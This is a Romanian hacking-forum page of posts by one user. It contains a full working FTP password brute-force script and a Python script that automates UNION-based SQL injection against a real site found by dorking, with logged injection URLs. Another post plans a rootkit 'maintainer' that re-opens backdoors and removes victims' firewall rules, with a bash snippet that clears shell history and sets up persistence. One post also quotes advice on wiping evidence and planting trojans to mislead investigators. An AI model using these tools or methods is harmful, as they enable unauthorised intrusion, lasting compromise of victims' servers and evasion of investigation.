Jump to content

Flubber

Active Members
  • Posts

    1765
  • Joined

  • Last visited

  • Days Won

    11

Posts posted by Flubber

  1. ronin33dan: da-i omului o pauza, cel putin el ARE pofta de invatat nu vrea sa ii sparga Gigi Cosciug id-u lu printesa mirabela. Bine ai venit Mihai, niste tutoriale video daca te intereseaza (destul de bunicele desi cam vechi - de prin 2003 daca nu ma insel) - CBT Nuggets: Linux Series, explica frumos pentru incepatori pana la avansati. In primele 4 clipuri vei invata foarte multe, hai sa zic 5, pana si chestii hardware (cum scrie un HDD -- este un exemplu pentru a-ti demonstra informatia oferita in tutorialele video, nu vorbeste doar "dai wget" "apoi tar zxvf" "ls" "# gata, esti 'hacker'!"), si asa mai departe. Succes pe forum!

  2. Recunosc acest stil de a programa in Python si de pe luna, gunslinger's style, un FTP bruteforcer tot de el scris:


    #!/usr/bin/python
    ################################################################
    # .___ __ _______ .___ #
    # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
    # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
    # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
    # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
    # \/ \/ \/ #
    # ___________ ______ _ __ #
    # _/ ___\_ __ \_/ __ \ \/ \/ / #
    # \ \___| | \/\ ___/\ / #
    # \___ >__| \___ >\/\_/ #
    # est.2007 \/ \/ forum.darkc0de.com #
    ################################################################
    # This is ftp brute force tools [Updated].
    # This was written for educational purpose and pentest only. Use it at your own risk.
    # Update : More efficient
    # : prevent loss added
    # : Anonymous checker added
    # VISIT : http://www.devilzc0de.com
    # CODING BY : gunslinger_
    # EMAIL : gunslinger.devilzc0de@gmail.com
    # TOOL NAME : ftpbrute.py v1.5
    # Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
    # Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family
    # Greetz : all member of jasakom.com, jatimcrew.com
    # Special i made for jasakom member and devilzc0de family
    # Please remember... your action will be logged in target system...
    # Author will not be responsible for any damage !!
    # Use it with your own risk

    import sys
    import time
    import os
    from ftplib import FTP

    if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
    SysCls = 'clear'
    elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
    SysCls = 'cls'
    else:
    SysCls = 'unknown'

    log = "ftpbrute.log"

    face = '''
    .___ .__ .__ _______ .___
    __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __
    / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ /
    / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ /
    \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/
    \/ \/ \/ \/ \/ \/ \/ \/ \/
    http://www.devilzc0de.com
    by : gunslinger_
    ftpbrute.py version 1.0
    Brute forcing ftp target
    Programmmer : gunslinger_
    gunslinger[at]devilzc0de[dot]com
    _____________________________________________________________________________________________________________________________________________
    '''

    option = '''
    Usage: ./ftpbrute.py [options]
    Options: -t, --target <hostname/ip> | Target to bruteforcing
    -u, --user <user> | User for bruteforcing
    -w, --wordlist <filename> | Wordlist used for bruteforcing
    -h, --help <help> | print this help

    Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt

    '''

    file = open(log, "a")

    def MyFace() :
    os.system(SysCls)
    print face
    file.write(face)


    def HelpMe() :
    MyFace()
    print option
    file.write(option)
    sys.exit(1)

    for arg in sys.argv:
    if arg.lower() == '-t' or arg.lower() == '--target':
    hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-u' or arg.lower() == '--user':
    user = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-w' or arg.lower() == '--wordlist':
    wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-h' or arg.lower() == '--help':
    HelpMe()
    elif len(sys.argv) <= 1:
    HelpMe()

    def checkanony() :
    try:
    print "\n[+] Checking for anonymous login\n"
    ftp = FTP(hostname)
    ftp.login()
    ftp.retrlines('LIST')
    print "\n[!] Anonymous login successfuly !\n"
    ftp.quit()
    except Exception, e:
    print "\n[-] Anonymous login unsuccessful...\n"
    pass



    def BruteForce(word) :
    print "[?]Trying :",word
    file.write("\n[?]Trying :"+word)
    try:
    ftp = FTP(hostname)
    ftp.login(user, word)
    ftp.retrlines('list')
    ftp.quit()
    print "\n\t[!] Login Success ! "
    print "\t[!] Username : ",user, ""
    print "\t[!] Password : ",word, ""
    print "\t[!] Hostname : ",hostname, ""
    print "\t[!] Log all has been saved to",log,"\n"
    file.write("\n\n\t[!] Login Success ! ")
    file.write("\n\t[!] Username : "+user )
    file.write("\n\t[!] Password : "+word )
    file.write("\n\t[!] Hostname : "+hostname)
    file.write("\n\t[!] Log all has been saved to "+log)
    sys.exit(1)
    except Exception, e:
    #print "[-] Failed"
    pass
    except KeyboardInterrupt:
    print "\n[-] Aborting...\n"
    file.write("\n[-] Aborting...\n")
    sys.exit(1)

    MyFace()
    print "[!] Starting attack at %s" % time.strftime("%X")
    print "[!] System Activated for brute forcing..."
    print "[!] Please wait until brute forcing finish !\n"
    file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
    file.write("\n[!] System Activated for brute forcing...")
    file.write("\n[!] Please wait until brute forcing finish !\n")
    checkanony()

    try:
    preventstrokes = open(wordlist, "r")
    words = preventstrokes.readlines()
    count = 0
    while count < len(words):
    words[count] = words[count].strip()
    count += 1
    except(IOError):
    print "\n[-] Error: Check your wordlist path\n"
    file.write("\n[-] Error: Check your wordlist path\n")
    sys.exit(1)

    print "\n[+] Loaded:",len(words),"words"
    print "[+] Server:",hostname
    print "[+] User:",user
    print "[+] BruteForcing...\n"
    for word in words:
    BruteForce(word.replace("\n",""))

    file.close()

  3. Majoritatea ne-am gandit la ideea asta, dar nu se stie cine poate s-o duca la perfectiune, ideea este ca o sa ai foarte mult de munca. Multa bafta!

    Poftim? Pai thread-ul asta a fost mai mult ca o invitatie la proiect, sa ne punem mai multi (cat mai multi) cu experienta capatanile la contributie si sa-l facem foarte foarte complex si eficient, adaugandu-i diferite optiuni.

  4. _|_ kwe :)

    Apropos, Nytro, daca ti se pare postul a fi un articol bun pentru revista respectiva, pot participa, daca doresti il pot reformula, bineinteles, folosind alti termeni si mai intai o introducere proprie facand referire la baza de date MySQL, etc.

    // P.S.: desi sincer nu prea le am fiindca nu m-am jucat cu MySQL deloc - da, exact, nu am instalat nicaieri si nici nu am "poke-uit-o" sa vad despre ce e vorba, la site-uri sunt praf, asa ca daca cineva mai experimentat s-ar oferii sa implementeze post-ul undeva sau sa-l reformuleze specificand anumite chestii ,explicandu-le mai bine... nicio problema...

    cheerz

  5. Ei bine, cand am invatat si eu cat de cat Python, m-am tot intrebat cand o sa imi vina la indemana, la inceput mi s-a parut o pierdere de timp, invatand numai operatii matematice, liste, definirea obiectelor, modulelor, input-uri ale user-ului si alte vrajeli (asta din niste tutoriale video de pe YouTube), au fost intr-un fel OK, pana la un anumit moment cand devenisem sa ma simt frustrat (pur si simplu pentru faptul ca totul parea newbish -- voiam deja sa pun in aplicare cunostintele dobandite, sa mi se dovedeasca a fi folositoare, sa imi demonstrez ca nu a fost o pierdere de timp), pana cand am citit de pe site (cel oficial Python docs) niste articole, la inceputul inceputurilor (cand am vizionat clipurile respective pe YT) mi s-au parut grele sau plictisitoare, acum avand un habar despre ce este vorba mi-au fost de ajutor ceva mai mult. Despre ce cacat vorbesc eu aici? Recent, facand niste SQLi folosindu-ma de dork-uri cu prietenul magic Google (da da, sunt un lamer, 'vai faci SQLi folosindu-te de dork-uri, asa, dai la gramada si ce iti vine pe mana dai deface sa te dai mare hec?r' -- nu asa sta treaba), am dat peste un site ce afisa in sursa. Pagina respectiva pe care browser-ul minunat Firefox o interpreta dupa tag-urile HTML nu afisa nimic ciudat, ci eroarea propriu-zisa MySQL. Facand mai multe incercari la baza MySQL mereu mi se returna eroarea magica foarte aiurea. Aruncand un ochi in acea sursa am observat ca intr-un string "rtmp://" scria versiunea, sau ma rog "raspunsul" interogarii mele. Ei bine aici a intervenit partea in care Python (oh, te iubesc!) mi-a fost de ajutor. Folosindu-ma de LIMIT (cu totii uram asta, cel putin eu la greu) am observat ca imi arata in sursa corespunzator, la LIMIT 0,1 "rtmp://rahat", la LIMIT 1,1 "rtmp://alt_rahat" si asa mai departe, automatizarea acestui moment mi-a economisit o gramada de timp.


    import urllib

    def rahat():
    print "# Coded by Flubber -2010- with help from cmiN -- thanks.\r\n"
    victima = raw_input("[?] Site: ")
    victima = "http://" + victima.replace("http://", "")
    print "[+] Site-ul este: " + '"' + str(victima) + '"' + ".\r\n"
    rangeA = input("[?] LIMIT range (exemplu: 50 va face de la LIMIT de la 0 la 50): ")
    print "[+] LIMIT range-ul a fost setat la: " + '"' + str(rangeA) + '"' + ".\r\n"
    print '[!] Acum setam back end string, lasa liber pentru a nu seta.'
    backend = raw_input("[?] Back end string: ")
    if backend == "":
    backend = ""
    else:
    print "[+] Back end-ul este: " + '"' + backend + '"' + "."
    print '\r\n[!] Acum setam logfile-ul (exemplu: "gigi.txt"), lasa liber pentru a seta default ("logz0r.txt").'
    logfile = raw_input("[?] Logfile: ")
    if logfile == "":
    logfile = "logz0r.txt"
    print "[+] Output-ul va fi scris in urmatorul fisier: " + '"' + logfile + '"' +".\r\n"
    for x in range(rangeA + 1)[:]:
    victimaB = victima + " LIMIT " + str(x) + ",1" + backend
    socket = urllib.urlopen(victimaB)
    source = socket.read()
    socket.close
    a = open(logfile, 'a')
    a.write("#"*10 + "\r\n" + victimaB + "#"*10 + "\r\n")
    a.write("##" + str(x) + "\r\n" + "#"*10 + "\r\n" + source + "\r\n\r\n\r\n\r\n\r\n")
    a.close()
    print "[LIMIT " + str(x) + ",1]:" , '"' + victimaB + '"' + ".\r\n"

    rahat()

    Script-ul de mai sus nu face decat sa ia sursa paginii si sa o salveze intr-un log. Bineinteles, sursa paginii care este apelata cu adresa RAHAT LIMIT 0,1 1,1 2,1 etc. (scuzati daca m-am exprimat gresit, intelegeti voi ce vreau sa zic). Bineinteles, script-ul l-am "confectionat" nevoilor mele, nu este unul care se poate folosii la orice site (cum ar fi sqlmap), interesant insa a fost faptul cand am observat ca interogarea nu avea succes daca adresa nu avea la sfarsit &type=flv, interogarea fiind SINTAXA/*&type=flv, momentul acela insemnand implementarea back-end-ului. Nu stiu pentru cati dintre voi este folositoare aceasta informatie, sau tot ce am scris eu aici, pentru mine a fost o experienta mai unica, am mai intalnit site-uri la care raspunsul era in sursa, dar nu in felul acesta. Ma scuzati daca par foarte noob (asta si sunt, si un mare script kiddie, si lamer), nu sunt nicidecum un hacker super geniu, si ma scuzati daca va frustrez cu informatii d-astea foarte joase, precum acest thread, dar sper ca pentru alti incepatori, sau drq stie, sa ii/le fie de folos.

    // LE: bah, las-o drq de treaba, ma chinui sa scriu un thread sperand ca este folositor si imi este distrus, toate spatiile, totul codul, la postare, ce naiba se intampla? faceti un fix! patchuiti problema, eu nu am sa stau sa-l rearanjez, este enervant

    // LE(2): Oh da, output-ul a fost urmatorul (asa m-am uitat peste tabelele care ma interesau):

    ##########

    http://www.site.com/pagina.php?id=-UN NUMAR DIN MULTE CIFRE union all select 1,concat(column_name),3,4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0xHEX LIMIT 12,1/*&type=flv

    ##########

    ##12

    ##########

    <html>

    <head>

    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">

    <link rel="stylesheet" type="text/css" href="css/player.css" />

    <!--

    <link rel="stylesheet" type="text/css" href="css/menu.css" />

    <link rel="stylesheet" type="text/css" href="css/webcasts.css">

    -->

    <script type="text/javascript" src="swfobject.js"></script>

    </head>

    <title>EX</title>

    <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

    <div align="center"><table cellspacing="0" cellpadding="0" border="0"><tr><td><img src=""></td></tr><tr><td valign="top" align="center"><span class="copy"><br />

    <b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>path site</b> on line <b>88</b><br />

    <b></b><br>from the project: <br><br></span></td></tr><tr><td><div id="player1" align="center"><script type="text/javascript">var s1 = new SWFObject("flvplayer.swf","single","7","28","7");s1.addParam("allowfullscreen","true");s1.addVariable("file","rtmp://name_author/3/4");s1.addVariable("id","");s1.addVariable("image","9");s1.addVariable("width","7");s1.addVariable("height","28");s1.addVariable("overstretch","fit");s1.write("player1");</script></div></td></tr><tr><td align="right"><span class="copy"><a href="javascript:window.close()"><img src="http://rstcenter.com/forum/images/buttons/popup_close.gif" border="0"></a> </span></td></tr></table></div>

    <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

    </script>

    <script type="text/javascript">

    _uacct = "UA-215568-1";

    urchinTracker();

    </script>

    </body></html>

    ##########

    http://www.site.com/pagina.php?id=-UN NUMAR DIN MULTE CIFRE union all select 1,concat(column_name),3,4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0xHEX LIMIT 13,1/*&type=flv

    ##########

    ##13

    ##########

    <html>

    <head>

    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">

    <link rel="stylesheet" type="text/css" href="css/player.css" />

    <!--

    <link rel="stylesheet" type="text/css" href="css/menu.css" />

    <link rel="stylesheet" type="text/css" href="css/webcasts.css">

    -->

    <script type="text/javascript" src="swfobject.js"></script>

    </head>

    <title>EX</title>

    <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

    <div align="center"><table cellspacing="0" cellpadding="0" border="0"><tr><td><img src=""></td></tr><tr><td valign="top" align="center"><span class="copy"><br />

    <b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>path site</b> on line <b>88</b><br />

    <b></b><br>from the project: <br><br></span></td></tr><tr><td><div id="player1" align="center"><script type="text/javascript">var s1 = new SWFObject("flvplayer.swf","single","7","28","7");s1.addParam("allowfullscreen","true");s1.addVariable("file","rtmp://affiliation/3/4");s1.addVariable("id","");s1.addVariable("image","9");s1.addVariable("width","7");s1.addVariable("height","28");s1.addVariable("overstretch","fit");s1.write("player1");</script></div></td></tr><tr><td align="right"><span class="copy"><a href="javascript:window.close()"><img src="http://rstcenter.com/forum/images/buttons/popup_close.gif" border="0"></a> </span></td></tr></table></div>

    <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

    </script>

    <script type="text/javascript">

    _uacct = "UA-215568-1";

    urchinTracker();

    </script>

    </body></html>

    ##########

    http://www.site.com/pagina.php?id=-UN NUMAR DIN MULTE CIFRE union all select 1,concat(column_name),3,4,5,6,7,8,9,10,11,12 from information_schema.columns where table_name=0xHEX LIMIT 14,1/*&type=flv

    ##########

    ##14

    ##########

    <html>

    <head>

    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">

    <link rel="stylesheet" type="text/css" href="css/player.css" />

    <!--

    <link rel="stylesheet" type="text/css" href="css/menu.css" />

    <link rel="stylesheet" type="text/css" href="css/webcasts.css">

    -->

    <script type="text/javascript" src="swfobject.js"></script>

    </head>

    <title>EX</title>

    <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

    <div align="center"><table cellspacing="0" cellpadding="0" border="0"><tr><td><img src=""></td></tr><tr><td valign="top" align="center"><span class="copy"><br />

    <b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>path site</b> on line <b>88</b><br />

    <b></b><br>from the project: <br><br></span></td></tr><tr><td><div id="player1" align="center"><script type="text/javascript">var s1 = new SWFObject("flvplayer.swf","single","7","28","7");s1.addParam("allowfullscreen","true");s1.addVariable("file","rtmp://email_author/3/4");s1.addVariable("id","");s1.addVariable("image","9");s1.addVariable("width","7");s1.addVariable("height","28");s1.addVariable("overstretch","fit");s1.write("player1");</script></div></td></tr><tr><td align="right"><span class="copy"><a href="javascript:window.close()"><img src="http://rstcenter.com/forum/images/buttons/popup_close.gif" border="0"></a> </span></td></tr></table></div>

    <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">

    </script>

    <script type="text/javascript">

    _uacct = "UA-215568-1";

    urchinTracker();

    </script>

    </body></html>

    Na ca l-am rearanjat putin intr-un final... offf, cat iubesc eu rst-u asta

    Aah! quote merge mai bine decat code

  6. In primul rand as dori sa intreb cati dintre voi folosesc rootkit-uri pe ssh-uri. Daca da, ati experimentat ca victima sa foloseasca rootkit hunter, sau alte 'programe' de detectarea/curatarea rootkit-urilor? Daca da, ce spuneti daca am face un maintainer, adica un script mai complex la care, in caz ca rootkit-ul tau va fi scos, sau eventual port-ul pe care backdoor-ul rootkit-ului "tau" l-a deschis este blocat in firewall (sa zicem... iptables) eventual maintainer-ul sa scoata acea regula, si sa aduca totul la ... "normal" (pentru tine). Ce ziceti? Idei,sugestii,impotriviri,critici?

    // Adaugare: Am uitat sa mentionez, cati dintre voi stiti BASH si un limbaj de programare?

    // O alta adaugare: Am uitat sa mentionez ca eu deja lucrez la un programel de genul asta, dar nu este foarte elaborat, cu ajutorul lui cmiN am reusit sa fac ceva ceva .... nu foarte super ci foarte primitv, in Python si BASH.

    Un mic snippet:


    [B]a[/B](fisierul fiind executabil [chmod +x]):

    #!/bin/bash
    echo "[#] Flubber | 2010 | with help from cmiN -- many thanks."
    echo "[#] Keep it private (DO NOT DISTRIBUTE) and enjoy."
    echo "[*] Unsetting some history."
    unset HISTFILE
    unset HISTLOG
    unset HISTSAVE
    history -c
    echo "[*] Please wait while I will check if you are root."
    if [ "$(whoami)" != "root" ]; then
    echo "[-] Sorry, you are not root. This script requires for you to be root in order to execute. Exiting."
    exit 1;
    else
    echo "[+] You are root. Proceeding further."
    echo "[*] Trying to get a way in this system and copy our 'toys' there."
    mkdir TARGET
    cp 1.py TARGET
    cp b.sh TARGET
    history -c
    echo "[+] Done. Also cleaned some history. Isn't that cute?"
    echo "[*] Chmodding our ev4l scr1p7s to execute."
    chmod +x TARGET/script.py
    chmod +x TARGET/scriptbash
    echo "[+] Ev4l scr1p7s chmodded to execute."
    [...] alte prostioare, cum ar fi adaugarea la boot-up prin rc.local si alte balarii [...]
    fi

    stiu ca verificarea cu whoami e o prostie, nu sunt sigur insa, nu am testat sa fac un user cu acces de root direct (uid 0, gid 0) si sa vad daca la whoami este user-ul si nu mai spune root (in cazul asta scriptul bash de initiere ar esua)

    pareri, opinii, se ofera cineva sa imbunatatim, sunt curios cati se baga care AU HABAR si sa fie de incredere, insemnand sa nu dea aiurea script-urile, catre script kiddies (nu ca eu nu as fi unul) care sa imprastie mai departe, ci sa fie tinuta mai.. "secret" arhiva, adica sa o aiba si sa o foloseasca doar cei CARE MERITA

    si aici ar fi fost in folos acea sectiune privata magica minune

    as intra in mai multe detalii, dar mai intai sa vad daca a avut cineva experiente de genul, specificati si rootkit-ul daca doriti, eu unul fac asta pentru VTBoV05RPT0= (dati de 2 ori stiti voi ce)

  7. @Mr49r

    Am luat mica mea descriere de pe phpromania, ca sa nu o mai rescriu din nou.

    Si poza ce legatura are, nu o sa sparg vre-un server niciodata pentru a obtine orice fel de informatie, vreau sa invat ca sa previn un astfel de atac. Deci in acest caz nu o sa am probleme cu nimeni :)

    Sir, no offense, DAR! Ca sa securizezi, sa previi astfel de atacuri (oricare ar fi ele) nu mai intai trebuie sa intelegi cum merg lucrurile, apoi sa gasesti gaurile, sa exploatezi, si sa repari. Am dreptate? Deci in principiu, mai intai trebuie sa "spargi" ca apoi sa patchuiesti/repari/etc.

    Daca am gresit, corecteaza-ma.

    Si bineinteles, UELC?M!

  8. 1. Sterge toate urmele din pc-ul tau dar nu da format. Fa-o in asa fel incat sa nu poata fi recuperate datele.

    2. Insealeaza un socks server pe pc si vreo 2-3 troieni.

    3. Ai grija sa modifici data instalarii respectivului socks server undeva inainte de toata chestia asta. Exista programe care te ajuta sa o faci.

    4. Explicatia ta va fi simpla in cazul unei anchete. "Nu stiu domne am virusi prin calculator". Daca se va face ancheta ti se va confisca pc-ul si vor vedea ca ai socks pe el asa ca vor trece mai departe cautandu-l pe cel care ti-a instalat socksul. Poti folosi CCProxy si poti modifica logurile din el din cate stiu pentru a le lasa impresia ca cineva s-a folosit de tine pentru a-si ascunde urmele.

    ^ si alte exemple de genul imi ridica o intrebare: BA DA EI NU AU TEHNOLOGIE?

    Nu, acum serios, din cate am auzit ei sunt prosti, dar au tehnologie au software avansat si din cate cred eu ce folosim noi e un rahatzel pentru ei + ca mai e si FBI-ul la noi (sau nu stiu ce agent special) pentru a se asigura ca totul merge conform planului. Chiar sunt curios, raspundeti-mi si mie la intrebare si anume (ma repet, ca-mi place), ei nu au software sa iti dea peste cap toate modificarile tale (gen ora modificarii etc)?

    P.S.: Mi-a venit somatie acasa sa platesc o amenda (prins in fapt fara bilet) ce ma faaac? 200 de lei, ma ustura buzunarul!11oneunutradus. Aoleoo ajung sa spal wc-uri publice! Nuuu!

  9. Nu sunt bun in python am incercat cat am putut si mia dat aceasta eroare:

    root@bt:~# python captha.py

    Traceback (most recent call last):

    File "captha.py", line 25, in <module>

    from pytesser import *

    ImportError: No module named pytesser

    Folosesc BackTrack4. daca aveti vreo solutie postati aici, am incercat sal definesc separat pe pytesser , dar stiam de la inceput ca nu o sa reusesc. Multumesc

    pytesser este un modul care trebuie importat, comanda aceea importa tot (*) din modulul respectiv (pytesser), in ordine sa-ti functioneze, trebuie:

    1: sa cauti daca exista modulul in folderele respective (extrase din arhiva -- daca asa s-a intamplat), daca nu vezi 2 ->

    -> 2: o cauti pe net sau dai e-mail celui care a facut proiectul, il poti intreba ce s-a intamplat cu libraria respectiva, daca este privata, iar daca nu si este sub gpl si open source... roaga-l frumos sa o impartaseasca cu tine

    sau.. 3: o faci tu de la 0

    // Le: arunca un ochi pe:

    http://github.com/srobertson/pytesser/blob/144e57a70bc46d4fd08fd067b6fb8d18a78661af/pytesser.py

    si pe: http://code.google.com/p/pytesser/downloads/detail?name=pytesser_v0.0.1.zip

    sper sa te fi ajutat, salut

  10. Ce design vedeti voi ma?

    Pentru inceput e OK, proiecte ca astea te lanseaza dar incearca sa experimentezi cat mai mult asa te vei duce in anumite probleme la care vei invata anumite chestii de pe urma rezolvarii lor, si aici triumfa practica fata de carticelele care sunt pe net si toate aburerile astea in video-uri s.a.m.d. fiindca altceva e in realitate si te poti lovii de o groaza de probleme.

    Straduieste-te mai mult in legatura cu Yahoo,AOL, etc. :-)

    Daca ai nevoie de o referinta, sau sa arunci un ochi pe diverse surse din care sa te inspiri: asta este o sursa buna.

    Bafta

  11. ^ cred ca parola e scrisa in rusa iar stealer-ul nu suporta scris-ul in rusa (gen apare patratele sau "?"), corectati-ma daca gresesc

    // pe de alta parte, pot fi niste stelute :-)

  12. Ehm nu m-am uitat la documentar , ma uit acum dar Flubber ai vazut astea..?

    [url=http://www.youtube.com/watch?v=aC-KOYQsIvU&feature=related]YouTube - How to make Hot Ice!!! Crazy[/url]

    [url]http://www.youtube.com/watch?v=cgAlxBEPEf4

    WHOAAA :o

    TREBUIE SA FAC!

    Multumesc frumos :D

  13. Partea cu doctorul respectiv care a inghetat apa aproape instant si apoi a pus-o la microscop vazandu-se cristalele acelea, dupa ce i s-a adresat in mai multe feluri o gasiti si in documentarul 'What the bleep do we know?'

    Unele chestii le stiam, altele insa nu, foarte interesant documentarul. Danke.

×
×
  • Create New...